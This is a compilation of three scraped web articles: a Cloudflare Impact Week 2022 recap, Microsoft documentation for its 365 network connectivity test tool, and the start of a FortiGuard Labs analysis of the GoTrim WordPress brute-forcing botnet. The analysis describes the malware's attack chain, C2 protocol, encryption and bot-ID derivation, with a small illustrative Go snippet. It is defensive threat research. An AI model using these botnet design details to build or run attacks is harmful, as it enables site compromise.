Everything you might have missed during Cloudflare’s Impact Week 2022

And that’s a wrap! Impact Week 2022 has come to a close. Over the last week, Cloudflare announced new commitments in our mission to help build a better Internet, including delivering Zero Trust services for the most vulnerable voices and for critical infrastructure providers. We also announced new products and services, and shared technical deep dives.

Were you able to keep up with everything that was announced? Watch the Impact Week 2022 wrap-up video on Cloudflare TV, or read our recap below for anything you may have missed.

Product announcements

  • Cloudflare Zero Trust for Project Galileo and the Athenian Project
    We are making the Cloudflare One Zero Trust suite available to teams that qualify for Project Galileo or Athenian at no cost. Cloudflare One includes the same Zero Trust security and connectivity solutions used by over 10,000 customers today to connect their users and safeguard their data.
  • Project Safekeeping – protecting the world’s most vulnerable infrastructure with Zero Trust
    Under-resourced organizations that are vital to the basic functioning of our global communities (such as community hospitals, water treatment facilities, and local energy providers) face relentless cyber attacks, threatening basic needs for health, safety and security. Cloudflare’s mission is to help make a better Internet. We will help support this vulnerable infrastructure by providing our enterprise-level Zero Trust cybersecurity solution to these organizations at no cost, with no time limit.
  • Cloudflare achieves FedRAMP authorization to secure more of the public sector
    We are excited to announce that our public sector suite of services, Cloudflare for Government, has achieved FedRAMP Moderate Authorization. The Federal Risk and Authorization Management Program (“FedRAMP”) is a US-government-wide program that provides a standardized approach to security assessment, authorization, and continuous monitoring for cloud products and services.
  • A new, configurable and scalable version of Geo Key Manager, now available in Closed Beta
    At Cloudflare, we want to give our customers tools that allow them to maintain compliance in this ever-changing environment. That’s why we’re excited to announce a new version of Geo Key Manager — one that allows customers to define boundaries by country, by region, or by standard.

Technical deep dives

  • Cloudflare is joining the AS112 project to help the Internet deal with misdirected DNS queries
    Cloudflare is participating in the AS112 project, becoming an operator of the loosely coordinated, distributed sink of the reverse lookup (PTR) queries for RFC 1918 addresses, dynamic DNS updates and other ambiguous addresses.
  • Measuring BGP RPKI Route Origin Validation
    The Border Gateway Protocol (BGP) is the glue that keeps the entire Internet together. However, despite its vital function, BGP wasn’t originally designed to protect against malicious actors or routing mishaps. It has since been updated to account for this shortcoming with the Resource Public Key Infrastructure (RPKI) framework, but can we declare it to be safe yet?

Customer stories

  • Democratizing access to Zero Trust with Project Galileo
    Learn how organizations under Project Galileo use Cloudflare Zero Trust to protect their organization from cyberattacks.
  • Securing the inboxes of democracy
    Cloudflare email security worked hard in the 2022 U.S. midterm elections to ensure that the email inboxes of those seeking office were secure.
  • Expanding Area 1 email security to the Athenian Project
    We are excited to share that we have grown our offering under the Athenian Project to include Cloudflare’s Area 1 email security suite to help state and local governments protect against a broad spectrum of phishing attacks to keep voter data safe and secure.
  • How Cloudflare helps protect small businesses
    Large-scale cyber attacks on enterprises and governments make the headlines, but the impacts of cyber conflicts can be felt more profoundly and acutely by small businesses that struggle to keep the lights on during normal times. In this blog, we’ll share new research on how small businesses, including those using our free services, have leveraged Cloudflare services to make their businesses more secure and resistant to disruption.

Internet access

  • Cloudflare expands Project Pangea to connect and protect (even) more community networks
    A year and a half ago, Cloudflare launched Project Pangea to help provide Internet services to underserved communities. Today, we’re sharing what we’ve learned by partnering with community networks, and announcing an expansion of the project.
  • The US government is working on an “Internet for all” plan. We’re on board.
    The US government has a $65 billion program to get all Americans on the Internet. It’s a great initiative, and we’re on board.
  • The Montgomery, Alabama Internet Exchange is making the Internet faster. We’re happy to be there.
    Internet Exchanges are a critical part of a strong Internet. Here’s the story of one of them.
  • Partnering with civil society to track Internet shutdowns with Radar Alerts and API
    We want to tell you more about how we work with civil society organizations to provide tools to track and document the scope of these disruptions. We want to support their critical work and provide the tools they need so they can demand accountability and condemn the use of shutdowns to silence dissent.
  • How Cloudflare helps next-generation markets
    At Cloudflare, part of our role is to make sure every person on the planet with an Internet connection has a good experience, whether they’re in a next-generation market or a current-gen market. In this blog we talk about how we define next-generation markets, how we help people in these markets get faster access to the websites and applications they use on a daily basis, and how we make it easy for developers to deploy services geographically close to users in next-generation markets.

Sustainability

  • Independent report shows: moving to Cloudflare can cut your carbon footprint
    We didn’t start out with the goal to reduce the Internet’s environmental impact. But as the Internet has become an ever larger part of our lives, that has changed. Our mission is to help build a better Internet — and a better Internet needs to be a sustainable one.
  • A more sustainable end-of-life for your legacy hardware appliances with Cloudflare and Iron Mountain
    We’re excited to announce an opportunity for Cloudflare customers to make it easier to decommission and dispose of their used hardware appliances in a sustainable way. We’re partnering with Iron Mountain to offer preferred pricing and value-back for Cloudflare customers that recycle or remarket legacy hardware through their service.
  • How we’re making Cloudflare’s infrastructure more sustainable
    With the incredible growth of the Internet, and the increased usage of Cloudflare’s network, even linear improvements to sustainability in our hardware today will result in exponential gains in the future. We want to use this post to outline how we think about the sustainability impact of the hardware in our network, and what we’re doing to continually mitigate that impact.
  • Historical emissions offsets (and Scope 3 sneak preview)
    Last year, Cloudflare committed to removing or offsetting the historical emissions associated with powering our network by 2025. We are excited to announce our first step toward offsetting our historical emissions by investing in 6,060 MTs’ worth of reforestation carbon offsets as part of the Pacajai Reduction of Emissions from Deforestation and forest Degradation (REDD+) Project in the State of Pará, Brazil.
  • How we redesigned our offices to be more sustainable
    Cloudflare is working hard to ensure that we’re making a positive impact on the environment around us, with the goal of building the most sustainable network. At the same time, we want to make sure that the positive changes that we are making are also something that our local Cloudflare team members can touch and feel, and know that in each of our actions we are having a positive impact on the environment around us. This is why we make sustainability one of the underlying goals of the design, construction, and operations of our global office spaces.
  • More bots, more trees
    Once a year, we pull data from our Bot Fight Mode to determine the number of trees we can donate to our partners at One Tree Planted. It’s part of the commitment we made in 2019 to deter malicious bots online by redirecting them to a challenge page that requires them to perform computationally intensive, but meaningless tasks. While we use these tasks to drive up the bill for bot operators, we account for the carbon cost by planting trees.

Policy

  • The Challenges of Sanctioning the Internet
    As governments continue to use sanctions as a foreign policy tool, we think it’s important that policymakers continue to hear from Internet infrastructure companies about how the legal framework is impacting their ability to support a global Internet. Here are some of the key issues we’ve identified and ways that regulators can help balance the policy goals of sanctions with the need to support the free flow of communications for ordinary citizens around the world.
  • An Update on Cloudflare’s Assistance to Ukraine
    On February 24, 2022, when Russia invaded Ukraine, Cloudflare jumped into action to provide services that could help prevent potentially destructive cyber attacks and keep the global Internet flowing. During Impact Week, we want to provide an update on where things currently stand, the role of security companies like Cloudflare, and some of our takeaways from the conflict so far.
  • Two months later: Internet use in Iran during the Mahsa Amini Protests
    A series of protests began in Iran on September 16, following the death in custody of Mahsa Amini — a 22 year old who had been arrested for violating Iran’s mandatory hijab law. The protests and civil unrest have continued to this day. But the impact hasn’t just been on the ground in Iran — the impact of the civil unrest can be seen in Internet usage inside the country, as well.
  • How Cloudflare advocates for a better Internet
    We thought this week would be a great opportunity to share Cloudflare’s principles and our theories behind policy engagement. Because at its core, a public policy approach needs to reflect who the company is through their actions and rhetoric. And as a company, we believe there is real value in helping governments understand how companies work, and helping our employees understand how governments and law-makers work.
  • Applying Human Rights Frameworks to our approach to abuse
    What does it mean to apply human rights frameworks to our response to abuse? As we’ll talk about in more detail, we use human rights concepts like access to fair process, proportionality (the idea that actions should be carefully calibrated to minimize any effect on rights), and transparency.
  • The Unintended Consequences of blocking IP addresses
    This blog dives into a discussion of IP blocking: why we see it, what it is, what it does, who it affects, and why it’s such a problematic way to address content online.

Impact

  • Closing out 2022 with our latest Impact Report
    Our Impact Report is an annual summary highlighting how we are trying to build a better Internet and the progress we are making on our environmental, social, and governance priorities.
  • Working to help the HBCU Smart Cities Challenge
    The HBCU Smart Cities Challenge invites all HBCUs across the United States to build technological solutions to solve real-world problems.
  • Introducing Cloudflare’s Third Party Code of Conduct
    Cloudflare is on a mission to help build a better Internet, and we are committed to doing this with ethics and integrity in everything that we do. This commitment extends beyond our own actions, to third parties acting on our behalf. We are excited to share our Third Party Code of Conduct, specifically formulated with our suppliers, resellers and other partners in mind.
  • The latest from Cloudflare’s seventeen Employee Resource Groups
    In this blog post, we highlight a few stories from some of our 17 Employee Resource Groups (ERGs), including the most recent, Persianflare.

What’s next?

That’s it for Impact Week 2022. But let’s keep the conversation going. We want to hear from you!

Visit the Cloudflare Community to share your thoughts about Impact Week 2022, or engage with our team on Facebook, Twitter, LinkedIn, and YouTube.

Or if you’d like to rewatch any Cloudflare TV segments associated with the above stories, visit the Impact Week hub on our website.


We protect entire corporate networks, help customers build Internet-scale applications efficiently, accelerate any website or Internet application, ward off DDoS attacks, keep hackers at bay, and can help you on your journey to Zero Trust.

Visit 1.1.1.1 from any device to get started with our free app that makes your Internet faster and safer.

To learn more about our mission to help build a better Internet, start here. If you’re looking for a new career direction, check out our open positions.

Source :
https://blog.cloudflare.com/everything-you-might-have-missed-during-cloudflares-impact-week-2022/

Microsoft 365 network connectivity test tool

The Microsoft 365 network connectivity test tool is located at https://connectivity.office.com. It’s an adjunct tool to the network assessment and network insights available in the Microsoft 365 admin center under the Health | Connectivity menu.

 Important

It’s important to sign in to your Microsoft 365 tenant as all test reports are shared with your administrator and uploaded to the tenant while you are signed in.

Connectivity test tool.

 Note

The network connectivity test tool supports tenants in WW Commercial but not GCC Moderate, GCC High, DoD or China.

Network insights in the Microsoft 365 Admin Center are based on regular in-product measurements for your Microsoft 365 tenant, aggregated each day. In comparison, network insights from the Microsoft 365 network connectivity test are run locally in the tool.

In-product testing is limited, and running tests local to the user collects more data resulting in deeper insights. Network insights in the Microsoft 365 Admin Center will show that there’s a networking problem at a specific office location. The Microsoft 365 connectivity test can help to identify the root cause of that problem and provide a targeted performance improvement action.

We recommend using these insights together: networking quality status can be assessed for each office location in the Microsoft 365 Admin Center, and more specific findings can be obtained after deploying testing based on the Microsoft 365 connectivity test.

What happens at each test step

Office location identification

When you click the Run test button, we show the running test page and identify the office location. You can type in your location by city, state, and country or choose to have it detected for you. If you detect the office location, the tool requests the latitude and longitude from the web browser and limits the accuracy to 300 meters by 300 meters before use. It’s not necessary to identify the location more accurately than the building to measure network performance.

JavaScript tests

After office location identification, we run a TCP latency test in JavaScript and we request data from the service about in-use and recommended Microsoft 365 service front door servers. When these tests are completed, we show them on the map and in the details tab where they can be viewed before the next step.

Download the advanced tests client application

Next, we start the download of the advanced tests client application. We rely on the user to launch the client application and they must also have .NET 6.0 Runtime installed.

There are two parts to the Microsoft 365 network connectivity test: the web site https://connectivity.office.com and a downloadable Windows client application that runs advanced network connectivity tests. Most of the tests require the application to be run. It will populate results back into the web page as it runs.

You’ll be prompted to download the advanced client test application from the web site after the web browser tests have completed. Open and run the file when prompted.

Advanced tests client application.

Start the advanced tests client application

Once the client application starts, the web page will update to show this result. Test data will start to be received by the web page. The page updates each time new data is received, and you can review the data as it arrives.

Advanced tests completed and test report upload

When the tests are completed, the web page and the advanced tests client will both show that. If the user is signed in, the test report will be uploaded to the customer’s tenant.

Sharing your test report

The test report requires authentication to your Microsoft 365 account. Your administrator selects how you can share your test report. The default settings allow for sharing of your reports with other users within your organization, and the ReportID link is not available. Reports will expire by default after 90 days.

Sharing your report with your administrator

If you’re signed in when a test report is run, the report is shared with your administrator.

Sharing with your Microsoft account team, support or other personnel

Test reports (excluding any personal identification) are shared with Microsoft employees. This sharing is enabled by default and can be disabled by your administrator in the Health | Network Connectivity page in the Microsoft 365 Admin Center.

Sharing with other users who sign in to the same Microsoft 365 tenant

You can choose users to share your report with. Being able to choose is enabled by default, but it can be disabled by your administrator.

Sharing a link to your test results with a user.

You can share your test report with anyone by providing access to a ReportID link. This link generates a URL that you can send to someone so that they can bring up the test report without signing in. This sharing is disabled by default and must be enabled by your administrator.

Sharing a link to your test results.

Network Connectivity Test Results

The results are shown in the Summary and Details tabs. The summary tab shows a map of the detected network perimeter and a comparison of the network assessment to other Microsoft 365 customers nearby. It also allows for sharing of the test report. Here’s what the summary results view looks like:

Network connectivity test tool summary results.

Here’s an example of the details tab output. On the details tab we show a green circle check mark if the result was compared favorably. We show a red triangle exclamation point if the result exceeded a threshold indicating a network insight. The following sections describe each of the details tab results rows and explain the thresholds used for network insights.

Network connectivity test tool example test results.

Your location information

This section shows test results related to your location.

Your location

The user location is detected from the user’s web browser. It can also be typed in at the user’s choice. It’s used to identify network distances to specific parts of the enterprise network perimeter. Only the city from this location detection and the distance to other network points are saved in the report.

The user office location is shown on the map view.

Network egress location (the location where your network connects to your ISP)

We identify the network egress IP address on the server side. Location databases are used to look up the approximate location for the network egress. These databases are typically accurate for about 90% of IP addresses. If the location looked up from the network egress IP address isn’t accurate, this could lead to a false result. To validate whether this error is occurring for a specific IP address, you can use publicly accessible network IP address location web sites to compare against your actual location.

Your distance from the network egress location

We determine the distance from that location to the office location. This is shown as a network insight if the distance is greater than 500 miles (800 kilometers) since that is likely to increase the TCP latency by more than 25 ms and may affect user experience.

The map shows the network egress location in relation to the user office location indicating the network backhaul inside of the enterprise WAN.

Implement local and direct network egress from user office locations to the Internet for optimal Microsoft 365 network connectivity. Improvements to local and direct egress are the best way to address this network insight.

Proxy server information

We identify whether proxy server(s) are configured on the local machine to pass Microsoft 365 network traffic in the Optimize category. We identify the distance from the user office location to the proxy servers.

The distance is tested first by ICMP ping. If that fails, we test with TCP ping and finally we look up the proxy server IP address in an IP address location database. We show a network insight if the proxy server is further than 500 miles (800 kilometers) away from the user office location.

Virtual private network (VPN) you use to connect to your organization

This test detects if you’re using a VPN to connect to Microsoft 365. A passing result will show if you have no VPN, or if you have a VPN with recommended split tunnel configuration for Microsoft 365.

VPN Split Tunnel

Each Optimize category route for Exchange Online, SharePoint Online, and Microsoft Teams is tested to see if it’s tunneled on the VPN. A split-out workload avoids the VPN entirely. A tunneled workload is sent over the VPN. A selective tunneled workload has some routes sent over the VPN and some split out. A passing result will show if all workloads are split out or selective tunneled.

Customers in your metropolitan area with better performance

Network latency between the user office location and the Exchange Online service is compared to other Microsoft 365 customers in the same metro area. A network insight is shown if 10% or more of customers in the same metro area have better performance. This means their users will have better performance in the Microsoft 365 user interface.

This network insight is generated on the basis that all users in a city have access to the same telecommunications infrastructure and the same proximity to Internet circuits and Microsoft’s network.

Time to make a DNS request on your network

This shows the DNS server configured on the client machine that ran the tests. It might be a DNS Recursive Resolver server; however, this is uncommon. It’s more likely to be a DNS forwarder server, which caches DNS results and forwards any uncached DNS requests to another DNS server.

This is provided for information only and does not contribute to any network insight.

Your distance from and/or time to connect to a DNS recursive resolver

The in-use DNS Recursive Resolver is identified by making a specific DNS request and then asking the DNS Name Server for the IP Address that it received the same request from. This IP Address is the DNS Recursive Resolver and it will be looked up in IP Address location databases to find the location. The distance from the user office location to the DNS Recursive Resolver server location is then calculated. This is shown as a network insight if the distance is greater than 500 miles (800 kilometers).

The location looked up from the network egress IP Address may not be accurate and this would lead to a false result from this test. To validate if this error is occurring for a specific IP Address, you can use publicly accessible network IP Address location web sites.

This network insight will specifically impact the selection of the Exchange Online service front door. To address this insight, local and direct network egress should be a prerequisite, and the DNS Recursive Resolver should then be located close to that network egress.

Exchange Online

This section shows test results related to Exchange Online.

Exchange service front door location

The in-use Exchange service front door is identified in the same way that Outlook does this and we measure the network TCP latency from the user location to it. The TCP latency is shown and the in-use Exchange service front door is compared to the list of best service front doors for the current location. This is shown as a network insight if one of the best Exchange service front door(s) isn’t in use.

Not using one of the best Exchange service front door(s) could be caused by network backhaul before the corporate network egress in which case we recommend local and direct network egress. It could also be caused by use of a remote DNS recursive resolver server in which case we recommend aligning the DNS recursive resolver server with the network egress.

We calculate a potential improvement in TCP latency (ms) to the Exchange service front door. This is done by looking at the tested user office location network latency and subtracting the network latency from the current location to the closest Exchange service front door. The difference represents the potential opportunity for improvement.

Best Exchange service front door(s) for your location

This lists the best Exchange service front door locations by city for your location.

Service front door recorded in the client DNS

This shows the DNS name and IP Address of the Exchange service front door server that you were directed to. It’s provided for information only and there’s no associated network insight.

SharePoint Online

This section shows test results related to SharePoint Online and OneDrive.

The service front door location

The in-use SharePoint service front door is identified in the same way that the OneDrive client does and we measure the network TCP latency from the user office location to it.

Download speed

We measure the download speed for a 15 Mb file from the SharePoint service front door. The result is shown in megabytes per second to indicate what size file in megabytes can be downloaded from SharePoint or OneDrive in one second. The number should be similar to one tenth of the minimum circuit bandwidth in megabits per second. For example, if you have a 100 Mbps Internet connection, you may expect 10 megabytes per second (10 MBps).

Buffer bloat

During the 15Mb download we measure the TCP latency to the SharePoint service front door. This is the latency under load and it’s compared to the latency when not under load. The increase in latency when under load is often attributable to consumer network device buffers being loaded (or bloated). A network insight is shown for any bloat of 100ms or more.

Service front door recorded in the client DNS

This shows the DNS name and IP Address of the SharePoint service front door server that you were directed to. It’s provided for information only and there’s no associated network insight.

Microsoft Teams

This section shows test results related to Microsoft Teams.

Media connectivity (audio, video, and application sharing)

This tests for UDP connectivity to the Microsoft Teams service front door. If this is blocked, then Microsoft Teams may still work using TCP, but audio and video will be impaired. Read more about these UDP network measurements, which also apply to Microsoft Teams at Media Quality and Network Connectivity Performance in Skype for Business Online.

Packet loss

Shows the UDP packet loss measured in a 10-second test audio call from the client to the Microsoft Teams service front door. This should be lower than 1.00% for a pass.

Latency

Shows the measured UDP latency, which should be lower than 100ms.

Jitter

Shows the measured UDP jitter, which should be lower than 30ms.

Connectivity

We test for HTTP connectivity from the user office location to all of the required Microsoft 365 network endpoints. These are published at https://aka.ms/o365ip. A network insight is shown for any required network endpoints that cannot be connected to.

Connectivity may be blocked by a proxy server, a firewall, or another network security device on the enterprise network perimeter. Connectivity to TCP port 80 is tested with an HTTP request, and connectivity to TCP port 443 is tested with an HTTPS request. If there’s no response, the FQDN is marked as a failure. If there’s an HTTP response code 407, the FQDN is marked as a failure. If there’s an HTTP response code 403, we check the Server attribute of the response, and if it appears to be a proxy server, we mark this as a failure. You can simulate the tests we perform with the Windows command-line tool curl.exe.
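For example, assuming the endpoint outlook.office365.com (any required FQDN from https://aka.ms/o365ip could be substituted), the port 80 and port 443 checks could be approximated with:

    curl.exe -v http://outlook.office365.com/
    curl.exe -v https://outlook.office365.com/

The -v output includes the response status code and headers, so you can look for a 407 or 403 response and inspect the Server header as described above.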

We test the SSL certificate at each required Microsoft 365 network endpoint that is in the Optimize or Allow category as defined at https://aka.ms/o365ip. If any test does not find a Microsoft SSL certificate, then the encrypted network connection must have been intercepted by an intermediary network device. A network insight is shown for any intercepted encrypted network endpoints.

Where an SSL certificate is found that isn’t provided by Microsoft, we show the FQDN for the test and the in-use SSL certificate owner. This SSL certificate owner may be a proxy server vendor, or it may be an enterprise self-signed certificate.

Network path

This section shows the results of an ICMP traceroute to the Exchange Online service front door, the SharePoint Online service front door, and the Microsoft Teams service front door. It’s provided for information only and there’s no associated network insight. Three traceroutes are provided: one to outlook.office365.com, one to the customer’s SharePoint front end (or to microsoft.sharepoint.com if one was not provided), and one to world.tr.teams.microsoft.com.
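For reference, a similar path trace can be gathered manually with the Windows tracert tool against the hostnames listed above (substituting your own tenant’s SharePoint hostname where applicable):

    tracert outlook.office365.com
    tracert microsoft.sharepoint.com
    tracert world.tr.teams.microsoft.com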

Connectivity reports

When you are signed in you can review previous reports that you have run. You can also share them or delete them from the list.

Reports.

Network health status

This shows any significant health issues with Microsoft’s global network, which might impact Microsoft 365 customers.

Network health status.

Testing from the Command Line

We provide a command line executable that can be used by your remote deployment and execution tools and run the same tests as are available in the Microsoft 365 network connectivity test tool web site.

The command line test tool can be downloaded here: Command Line Tool

You can run it by double clicking the executable in Windows File Explorer, or you can start it from a command prompt, or you can schedule it with task scheduler.

The first time you launch the executable you will be prompted to accept the end user license agreement (EULA) before testing is performed. If you have already read and accepted the EULA you can create an empty file called Microsoft-365-Network-Connectivity-Test-EULA-accepted.txt in the current working directory for the executable process when it is launched. To accept the EULA you can type ‘y’ and press enter in the command line window when prompted.
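For example, one way to pre-create that marker file from a CMD prompt in the executable’s working directory (using the file name from the paragraph above) is:

    type nul > Microsoft-365-Network-Connectivity-Test-EULA-accepted.txt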

The executable accepts the following command line parameters (an example invocation is shown after the list):

  • -h to show a link to this help documentation
  • -testlist <test> Specifies tests to run. By default only basic tests are run. Valid test names include: all, dnsConnectivityPerf, dnsResolverIdentification, bufferBloat, traceroute, proxy, vpn, skype, connectivity, networkInterface
  • -filepath <filedir> Directory path of test result files. Allowed value is absolute or relative path of an accessible directory
  • -city <city> For the city, state, and country fields the specified value will be used if provided. If not provided then Windows Location Services (WLS) will be queried. If WLS fails, the location will be detected from the machine’s network egress
  • -state <state>
  • -country <country>
  • -proxy <account> <password> Proxy account name and password can be provided if you require a proxy to access the Internet
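For example, an unattended run that executes every test and writes results to a chosen folder might look like the following; the directory and location values are purely illustrative:

    Microsoft.Connectivity.Test.exe -testlist all -filepath C:\ConnectivityResults -city Seattle -state Washington -country "United States"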

Results

Results are written to a JSON file in a folder called TestResults, which is created in the current working directory of the process unless it already exists. The filename format for the output is connectivity_test_result_YYYY-MM-DD-HH-MM-SS.json. The results are in JSON nodes that match the output shown on the web page for the Microsoft 365 network connectivity test tool web site. A new result file is created each time you run it, and the standalone executable does not upload results to your Microsoft tenant for viewing in the Admin Center Network Connectivity pages. Front door codes, longitudes, and latitudes are not included in the result file.

Launching from Windows File Explorer

You can simply double click on the executable to start the testing and a command prompt window will appear.

Launching from the Command Prompt

On a CMD.EXE command prompt window you can type the path and name of the executable to run it. The filename is Microsoft.Connectivity.Test.exe

Launching from Windows Task Scheduler

In Windows Task Scheduler you can add a task to launch the standalone test executable. You should specify the current working directory of the task to be where you have created the EULA accepted file since the executable will block until the EULA is accepted. You cannot interactively accept the EULA if the process is started in the background with no console.

More details on the standalone executable

The command-line tool uses Windows Location Services to find the user’s city, state, and country information for determining some distances. If Windows Location Services is disabled in the Control Panel, then user-location-based assessments will be blank. In Windows Settings, “Location services” must be on and “Let desktop apps access your location” must also be on.

The command-line tool will attempt to install the .NET Framework if it is not already installed. It will also download the main testing executable from the Microsoft 365 network connectivity test tool and launch that.

Test using the Microsoft Support and Recovery Assistant

Microsoft Support and Recovery Assistant (Assistant) automates all the steps required to execute the command-line version of the Microsoft 365 network connectivity test tool on a user’s machine and creates a report similar to the one created by the web version of the connectivity test tool. Note, the Assistant runs the command line version of Microsoft 365 network connectivity test tool to produce the same JSON result file, but the JSON file is converted into .CSV file format.

Download and Run the Assistant Here

Viewing Test Results

Reports can be accessed in the following ways:

The reports will be available on the screen below once the Assistant has finished scanning the user’s machine. To access these reports, click the “View log” option.

Microsoft Support and Recovery Assistant wizard.

Connectivity test results and Telemetry data are collected and uploaded to the uploadlogs folder. To access this folder, use one of the following methods:

  • Open Run (Windows logo key + R), and run the %localappdata%\saralogs\uploadlogs command as follows:
Run dialog for locating output.
  • In File Explorer, type C:\Users\<UserName>\AppData\Local\saralogs\uploadlogs and press Enter as follows:
Windows Explorer Address Bar for output.

Note: <UserName> is the user’s Windows profile name. To view the information about the test results and telemetry, double-click and open the files.

Windows Explorer SARA Output Files.

Types of result files

Microsoft Support and Recovery Assistant creates 2 files:

  1. Network Connectivity Report (CSV): This report runs the raw JSON file against a rule engine to make sure defined thresholds are being met; if they are not met, a “warning” or “error” is displayed in the output column of the CSV file. You can view the NetworkConnectivityReport.csv file to be informed about any detected issues or defects. Please see What happens at each test step for details on each test and the thresholds for warnings.
  2. Network Connectivity Scan Report (JSON) This file provides the raw output test results from the command-line version of the Microsoft 365 network connectivity test tool (MicrosoftConnectivityTest.exe).

FAQ

Here are answers to some of our frequently asked questions.

What is required to run the advanced test client?

The advanced test client requires .NET 6.0 Runtime. If you run the advanced test client without that installed you will be directed to the .NET 6.0 installer page. Be sure to install from the Run desktop apps column for Windows. Administrator permissions on the machine are required to install .NET 6.0 Runtime.

The advanced test client uses SignalR to communicate with the web page. For this, you must ensure that TCP port 443 connectivity to connectivity.service.signalr.net is open. This URL isn’t published at https://aka.ms/o365ip because that connectivity isn’t required for a Microsoft 365 client application user.

What is Microsoft 365 service front door?

The Microsoft 365 service front door is an entry point on Microsoft’s global network where Office clients and services terminate their network connection. For an optimal network connection to Microsoft 365, it’s recommended that your network connection is terminated into the closest Microsoft 365 front door in your city or metro.

 Note

Microsoft 365 service front door has no direct relationship to the Azure Front Door Service product available in the Azure marketplace.

What is the best Microsoft 365 service front door?

A best Microsoft 365 service front door (formerly known as an optimal service front door) is one that is closest to your network egress, generally in your city or metro area. Use the Microsoft 365 network performance tool to determine location of your in-use Microsoft 365 service front door and the best service front door(s). If the tool determines your in-use front door is one of the best ones, then you should expect great connectivity into Microsoft’s global network.

What is an internet egress location?

The internet egress location is the location where your network traffic exits your enterprise network and connects to the Internet. This is also identified as the location where you have a Network Address Translation (NAT) device and usually where you connect with an Internet Service Provider (ISP). If you see a long distance between your location and your internet egress location, then this may identify a significant WAN backhaul.

Related topics

  • Network connectivity in the Microsoft 365 Admin Center
  • Microsoft 365 network performance insights
  • Microsoft 365 network assessment
  • Microsoft 365 Network Connectivity Location Services

Source :
https://learn.microsoft.com/en-us/Microsoft-365/Enterprise/office-365-network-mac-perf-onboarding-tool?view=o365-worldwide

GoTrim: Go-based Botnet Actively Brute Forces WordPress Websites

FortiGuard Labs recently encountered a previously unreported Content Management System (CMS) scanner and brute forcer written in the Go programming language (also commonly referred to as Golang). We took a closer look at this malware because it was being described in several online forums as being installed in compromised WordPress sites, but there were no publicly available analysis reports.

  • Affected Platforms: Linux
  • Impacted Users: Any organization
  • Impact: Remote attackers gain control of the vulnerable systems
  • Severity Level: Critical

Golang brute forcers are not new. For example, we previously reported on the StealthWorker campaign in 2019. This new brute forcer is part of a new campaign we have named GoTrim because it was written in Go and uses “:::trim:::” to split data communicated to and from the C2 server.

Similar to StealthWorker, GoTrim also utilizes a bot network to perform distributed brute force attacks. The earliest sample we found was from Sep 2022. That campaign is still ongoing at the time of writing.   

This article details how this active botnet scans and compromises websites using WordPress and OpenCart. We also highlight some differences between samples collected from Sep to Nov 2022 at the end of the article.

Attack Chain

Figure 1: GoTrim attack chain

GoTrim uses a bot network to perform distributed brute force attacks against its targets. Each bot is given a set of credentials to use to attempt to log into a long list of website targets. After a successful login, a bot client is installed into the newly compromised system. It then awaits further commands from the threat actors, thereby expanding the bot network.

GoTrim only reports credentials to the C2 server after a successful brute force attempt. We did not observe any code in GoTrim for propagating itself or deploying other malware. However, we did find PHP scripts that download and execute GoTrim bot clients. It seems likely that the threat actor is somehow abusing compromised credentials to deploy PHP scripts to infect systems with GoTrim.

Figure 2: PHP downloader script

Typically, each script downloads the GoTrim malware from a hardcoded URL to a file in the same directory as the script itself and executes it. To cover its tracks, both the downloader script and GoTrim brute forcer are deleted from the infected system. It does not maintain persistence in the infected system.

Static Analysis

Analysis detailed in this article is based on a sample with SHA-256 hash c33e50c3be111c1401037cb42a0596a123347d5700cee8c42b2bd30cdf6b3be3, unless stated otherwise.

GoTrim is built with Go version 1.18. As with all Go applications, all third-party libraries used in the code are statically linked to the malware, resulting in a relatively bigger file size for the executable binary. But this has the advantage of not depending on any external files to execute correctly. To solve the size issue, the malware is packed using UPX to reduce the file from 6 MB to 1.9 MB.

Another advantage of using Go is that the same source code can be cross-compiled to support different architectures and Operating Systems. Based on the source code paths in the samples, Windows was used during the development of GoTrim. However, we have only observed samples targeting 64-bit Linux in the wild.

C2 Communication

GoTrim can communicate with its Command and Control (C2) server in two ways: a client mode, where it sends HTTP POST requests to the C2 server, or a server mode, where it starts an HTTP server to listen for incoming POST requests. All data exchanged with the C2 is encrypted using the Advanced Encryption Standard in Galois/Counter Mode (AES-GCM) with a key derived from a passphrase embedded in the malware binary.

By default, GoTrim attempts to run in server mode if the infected machine is directly connected to the Internet—that is, if the victim’s outbound or local IP address is non-private. Otherwise, it switches to client mode.

Upon execution, GoTrim creates an MD5 hash representing a unique identification for the infected machine (bot ID). This is generated from the following string containing several pieces of information delimited by the “:” character:

VICTIM_EXTERNAL_IP:HTTP_SERVER_PORT:1:OUTBOUND_IP:AES_PASSPHRASE

  • VICTIM_EXTERNAL_IP: External/public IP of the machine
  • HTTP_SERVER_PORT: HTTP server port. This is a randomly generated number between 4000 and 8000 for the HTTP server in server mode. It is always 0 for client mode.
  • Malware initialization flag: Always set to 1 by the time the bot ID is being calculated
  • OUTBOUND_IP: Outbound/local IP address of the victim machine.
  • AES_PASSPHRASE: Hardcoded string embedded into each sample. This malware later uses the SHA256 hash of this string as the AES-GCM key for encrypting its communication with the C2 server. The same AES passphrase is shared among all samples we observed.
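As a minimal sketch of how such an identifier could be derived from the fields above (all values and the passphrase below are placeholders, not data recovered from the malware):

    package main

    import (
        "crypto/md5"
        "fmt"
    )

    func main() {
        // Placeholder values for the fields described above.
        externalIP := "203.0.113.10"       // VICTIM_EXTERNAL_IP
        serverPort := 0                    // HTTP_SERVER_PORT (0 in client mode)
        initFlag := 1                      // malware initialization flag
        outboundIP := "192.168.1.20"       // OUTBOUND_IP
        passphrase := "example-passphrase" // AES_PASSPHRASE (hardcoded in real samples)

        // Join the fields with ":" and take the MD5 hash of the result as the bot ID.
        raw := fmt.Sprintf("%s:%d:%d:%s:%s", externalIP, serverPort, initFlag, outboundIP, passphrase)
        botID := fmt.Sprintf("%x", md5.Sum([]byte(raw)))
        fmt.Println(botID)
    }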

After generating the bot ID, GoTrim creates an asynchronous Go routine (similar to multithreading) that sends a beacon request to the C2 server on both client and server modes.

The C2 request URLs change between versions, as discussed in a later section of this article. For this particular sample, the beacon request URL is “/selects?dram=1”.

In this beacon request, several pieces of victim and bot information are sent to the C2 server, as seen in Figure 3.

Figure 3: Screenshot of data sent to the C2 server

Some of the interesting fields sent in the beacon request include the following:

1. Bot ID: unique ID for the bot
2. External IP: public IP address of the victim machine
3. HTTP Server Port: randomly generated port for the HTTP server (0 in client mode)
4. Malware Initialization Flag: always set to 1 by the time this request is made
5. Outbound IP: local IP address of the victim machine
6. Status Message: The “GOOD” message is replaced by other strings that report the status of any running CMS detection or brute forcing tasks during subsequent beacon requests.
7. Status Flags: These indicate whether the malware currently has any processing tasks assigned by the C2 server and the IDs of these tasks
